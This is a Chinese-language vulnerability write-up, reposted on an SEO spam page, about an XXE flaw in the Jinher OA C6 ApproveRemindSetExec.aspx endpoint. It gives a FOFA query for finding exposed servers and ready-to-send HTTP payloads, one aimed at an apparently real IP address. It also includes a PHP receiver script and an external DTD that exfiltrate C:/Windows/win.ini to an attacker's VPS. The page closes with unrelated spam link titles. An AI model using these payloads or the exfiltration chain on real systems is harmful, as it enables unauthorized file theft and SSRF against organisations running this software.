当前位置: 首页 > news >正文

网站建设与制百度排名优化软件

网站建设与制,百度排名优化软件,临海做网站的公司,网站建设销售一个月开几个单0x01 产品描述: 金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制…

0x01 产品描述:

        金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。
0x02 漏洞描述:

        金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞,未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。
0x03 搜索语句:

Fofa:body="c6/Jhsoft.Web.login"


0x04 漏洞复现:

利用dnslog复现

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.0olbin.dnslog.cn"> %remote;]>

 

服务器快速检测: 

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: 61.133.99.56:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-vps:port/test.xml"> %remote;]>

利用dtd获取数据:

整体流程:poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。

首先在vps上创建以下脚本:

<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

 构造dtd用以读取,dtd里内容如下

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-vps:port/get.php?file=%file;'>">

构造完成后vps启动服务用于信息监听

请求构造以下数据

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % remote SYSTEM "http://your-vps:port/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

 

 获取win.ini数据

解码后

0x05 修复建议:

官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/

http://www.yidumall.com/news/95021.html

相关文章:

  • 艺术网站源码阿里云域名注册入口官网
  • 做网站包含的技术seo查询 站长工具
  • 向国外卖货的电商平台简述什么是seo
  • 安徽网站建设案例百度首页入口
  • 权重域名做网站有用么什么样的人适合做营销
  • 做网站公司不负责任怎么办aso优化工具
  • 上海 餐饮网站建设新手如何涨1000粉
  • 网站建设的市场情况网站模版
  • 美工做图哪个网站好少儿编程培训机构排名前十
  • 免费网站空间phpseo交流博客
  • 为什么做图书管理网站小说引流推广
  • 网站页眉设计网络营销的主要方式
  • 软件开发的工资seo是什么职业做什么的
  • 企业网站做几个合适网络安全
  • 优酷如何做收费视频网站最好用的磁力搜索器
  • 东莞网站建设0769dt网络营销的概念与含义
  • 广州网站建设厂家seo包年服务
  • 网站的大图标怎么做武汉seo招聘
  • 教育培训类网站设计网页设计
  • 只做彩票网站犯法吗淘宝seo是什么意思
  • java怎么做网站国内重大新闻十条
  • 武汉做手机网站淘宝热搜关键词排行榜
  • 东莞做网站的联系电长沙h5网站建设
  • 武汉做网站训建设网站的十个步骤
  • 宋祖儿在哪个网站做网红搜索引擎优化方法与技巧
  • 武汉网站建设哪家最好线下推广有哪些渠道
  • 设计网站无锡阿里云自助建站
  • 做淘宝客网站详细步骤目前最牛的二级分销模式
  • ag娱乐建设网站关键词优化的主要工具
  • 做django后台网站seo搜索引擎营销工具